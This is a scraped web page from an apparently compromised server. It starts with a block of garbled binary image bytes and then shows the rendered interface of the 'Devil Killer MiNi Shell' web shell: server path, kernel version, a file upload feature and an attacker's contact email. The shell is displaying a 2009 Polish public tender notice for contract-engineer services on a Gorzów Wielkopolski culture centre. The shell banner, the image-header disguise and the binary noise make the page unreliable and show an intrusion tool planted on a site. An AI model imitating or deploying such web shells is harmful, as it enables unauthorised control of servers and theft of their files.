JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090813/278658-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: Pełnienie funkcji inżyniera kontraktu dla projektu p.n.
Rozwój infrastruktury kulturowej poprzez przebudowę Amfiteatru 
i rozbudowę Miejskiego Centrum Kultury w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 278658 - 2009; data zamieszczenia: 13.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Centrum Kultury , ul. Drzymały 26, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 0-95 7202911, faks 0-95 7202911 wew. 28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.emceka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka kultury..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inżyniera kontraktu dla projektu p.n.
Rozwój infrastruktury kulturowej poprzez przebudowę Amfiteatru 
i rozbudowę Miejskiego Centrum Kultury w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji inżyniera kontraktu dla 
projektu pn.:

Rozwój infrastruktury kulturowej poprzez przebudowę Amfiteatru i rozbudowę Miejskiego Centrum Kultury w Gorzowie Wlkp.


2.  Zamówienie obejmuje następujące czynności:

1) weryfikacja dokumentacji technicznej oraz kontakty robocze z prowadzącym postępowanie o udzielenie zamówienia publicznego na wybór wykonawcy robót budowlanych do każdego z zadań projektu (przebudowa Amfiteatru i rozbudowa Miejskiego Centrum Kultury w Gorzowie Wlkp).
2) pełnienie nadzoru inwestorskiego nad realizacją robót, zgodnie z ustawą Prawo budowlane oraz funkcji Inżyniera Kontraktu zgodnie z warunkami kontraktowymi,
3) prowadzenie sprawozdawczości związanej z realizacją projektu zgodnie z wymogami funduszu współfinansującego zadanie, 
4) prowadzanie ocen, konsultacji i ewentualnych korekt rozliczeń rzeczowo-finansowych projektu z Instytucją Zarządzającą,
5) sporządzanie rozliczeń rzeczowo - finansowych oraz realizacja obowiązków sprawozdawczych, wynikających z umowy pomiędzy Zamawiającym i Urzędem  Marszałkowskim, rozliczenie końcowe inwestycji w terminie do 1 m-ca od daty odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy spełniający warunki
określone w art. 22 ust. 1 Pzp, tj.:

         1. posiadają uprawnienia do wykonywania działalności lub czynności. 
   2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
       technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią
       pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego
       i osób zdolnych do wykonania zamówienia, a w szczególności: 
           1) w okresie ostatnich trzech lat lub jeśli okres działalności jest krótszy to 
               w tym czasie, pełnił funkcję inżyniera kontraktu na przynajmniej trzech
               inwestycjach współfinansowanych ze środków Unii Europejskiej, w tym
               minimum jednej o charakterze podobnym do robót objętych funkcją inżyniera
               kontraktu w ramach niniejszego zamówienia i wartości robót budowlanych
               nie mniej niż 20 000 000,00  zł. Zamawiający za roboty o podobnym charakterze
               rozumie roboty w zakresie budowy, przebudowy lub rozbudowy obiektów
               użyteczności publicznej.
2) wskażą do uczestniczenia w wykonaniu niniejszego zamówienia następujące
    osoby, którymi dysponują lub będą dysponować, wraz z informacjami na temat ich
    kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do
    wykonania zamówienia, a także zakresu wykonywania przez nich czynności:
1	Kierownika Zespołu (Inżynier Rezydent) posiadającego:
- wykształcenie techniczne,
- minimum 5-letnie doświadczenie zawodowe w zakresie pełnienia funkcji
  Kierownika Zespołu/ Inżyniera Rezydenta/ Inżyniera Kontraktu, 
- doświadczenie w pełnieniu funkcji Kierownika Zespołu/ Inżyniera
  Rezydenta na min. dwóch kontraktach obejmujących roboty budowlane
  współfinansowane ze środków Unii Europejskiej,
- aktualne uprawnienia budowlane do kierowania robotami budowlanymi
  bez ograniczeń w specjalności konstrukcyjno-budowlanej,
2	Inspektora nadzoru w specjalności konstrukcyjno-budowlanej
   posiadającego:
- wykształcenie techniczne,
- minimum 5-letnie doświadczenie zawodowe w pełnieniu funkcji
  Inspektora Nadzoru,
- doświadczenie w pełnieniu funkcji inspektora nadzoru robót
  budowlanych na minimum dwóch kontraktach obejmujących roboty
  budowlane o charakterze podobnym do robót objętych funkcją inżyniera
  kontraktu w ramach niniejszego zamówienia. Definicje robót 
  o charakterze podobnym Zamawiający przedstawił w pkt 2, ppkt 1)
- aktualne uprawnienia budowlane do kierowania robotami budowlanymi
  bez ograniczeń w specjalności konstrukcyjno-budowlanej,
3	Inspektora nadzoru w specjalności sanitarnej posiadającego:
- wykształcenie techniczne,
- minimum 5-letnie doświadczenie zawodowe w pełnieniu funkcji
  Inspektora Nadzoru,
- doświadczenie w pełnieniu funkcji inspektora nadzoru robót budowlanych
  na minimum dwóch kontraktach obejmujących roboty w zakresie sieci
  oraz instalacji wodnej i kanalizacyjnej,
- aktualne uprawnienia budowlane do kierowania robotami budowlanymi 
  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
  cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych
  bez ograniczeń, 
4	Inspektora nadzoru w specjalności elektrycznej posiadającego:
- wykształcenie techniczne,
- minimum 5-letnie doświadczenie zawodowe w pełnieniu funkcji
  Inspektora Nadzoru,
- doświadczenie w pełnieniu funkcji inspektora nadzoru robót budowlanych
  na minimum dwóch kontraktach obejmujących roboty w zakresie
  instalacji  elektrycznych,
- aktualne uprawnienia budowlane do kierowania robotami budowlanymi 
  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
  elektrycznych i elektro-energetycznych bez ograniczeń, 
5	Specjalistę ds. rozliczeń i sprawozdawczości - posiadającego:
- wykształcenie minimum średnie,
- doświadczenie w prowadzeniu obmiarów i analizy kosztów budowy,
  sprawozdawczości na co najmniej dwóch kontraktach na roboty
  budowlane współfinansowanych ze środków Unii Europejskiej,

  UWAGA: 
                     zamawiający nie dopuszcza łączenia funkcji wymienionych powyżej. 

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
      zamówienia, tj. posiadają dostęp do środków finansowych, linii kredytowych 
      lub innych ułatwień finansowych w wysokości minimum 300 000,00 zł.
4.	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej 
      działalności gospodarczej na kwotę nie mniejszą niż 2 000 000,00 zł.
5.	nie podlegają wykluczeniu z postępowania na podstawie art. 24 Pzp

       i złożą dokumenty jak w pkt VIII SIWZ.

       Zamawiający, na podstawie złożonych przez Wykonawcę dokumentów, dokona oceny
      spełnienia warunków podmiotowych według formuły spełnia - nie spełnia.

       Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem
       Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uzna
     się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. oświadczenie o spełnieniu warunków jak pkt VII S.I.W.Z. i ofertę zgodną ze S.I.W.Z.,
 
 i dokumentów:

1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
2.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne  i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 Ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5.	Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców,
6.	Dokumenty potwierdzające, że wykazane usługi zostały wykonane należycie.
7.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia i zakresu wykonywanych czynności, zgodnie z warunkiem jak w pkt VII SIWZ
8.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 7. Wykonawca wskazał osoby, którymi będzie dysponował.
9.	Dokumenty stwierdzające, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień: uprawnienia budowlane do kierowania/ nadzorowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem (zgodnie z Ustawą prawo budowlane) oraz aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa dla osób wskazanych do realizacji zamówienia, 
10.	Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
11.	Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansową lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2., 3. i 4. Składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

1.	Nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.	Nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 3. składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 Pzp. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu/ -ów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy do dokumentu/ -ów stosuje się odpowiednio jak wyżej.

Zamawiający wymaga w stosunku do podmiotów (partnerów) ubiegających się wspólnie o udzielenie zamówienia (składających wspólną ofertę, np. konsorcjów, spółek cywilnych), aby:
1.	Każdy z nich oddzielnie udokumentował, że posiada uprawnienia do wykonywania działalności lub czynności oraz że nie podlega wykluczeniu z postępowania na podstawie art. 24 Pzp.
2.	Podmioty udokumentowały, że łącznie spełniają wymagane warunki w zakresie wymaganej wiedzy i doświadczenia, dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia oraz potencjału ekonomicznego, finansowego zapewniającego wykonanie zamówienia.
3.	Ustanowiły Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty.
 
W celu potwierdzenia spełniania warunków podmioty (partnerzy) ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do przedstawienia w ofercie następujących oświadczeń i dokumentów:
1.	Oświadczenie z art. 22 ust. 1 Pzp - podpisane przez każdy podmiot (partnera) ubiegający się wspólnie o udzielenie zamówienia.
2.	Oświadczenie z art. 22 ust. 1 pkt. 2 i 3 Pzp odpowiednio do sytuacji Wykonawcy - podpisane przez Pełnomocnika.
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - dla każdego podmiotu (partnera) z osobna ubiegającego się wspólnie o udzielenie zamówienia. 
4.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - dla każdego podmiotu (partnera) z osobna ubiegającego się wspólnie o udzielenie zamówienia.
5.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Pzp - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - dla każdego podmiotu (partnera) z osobna ubiegającego się wspólnie o udzielenie zamówienia.
6.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Pzp - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - dla każdego podmiotu (partnera) z osobna ubiegającego się wspólnie o udzielenie zamówienia. 
7.	Wykaz zrealizowanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, obejmujący usługi , odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, dla wszystkich podmiotów (partnerów) wspólnie, podpisany przez Pełnomocnika. 
8.	Dokumenty potwierdzające, że usługi określone w pkt 7 zostały wykonane należycie.
9.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia i zakresu wykonywanych czynności, dla wszystkich podmiotów (partnerów) wspólnie, podpisany przez Pełnomocnika.
10.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 9. Wykonawca wskazał osoby, którymi będzie dysponował.
11.	Dokumenty stwierdzające, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

Ponadto wyrażą zgodę na wykonanie zamówienia zgodnie z warunkami zawartymi 
w S. I. W. Z...</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.emceka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W sekretariacie Siedziby Zamawiającego..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2009 godzina 14:00, miejsce: sekretariat siedziby zamawiajacego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com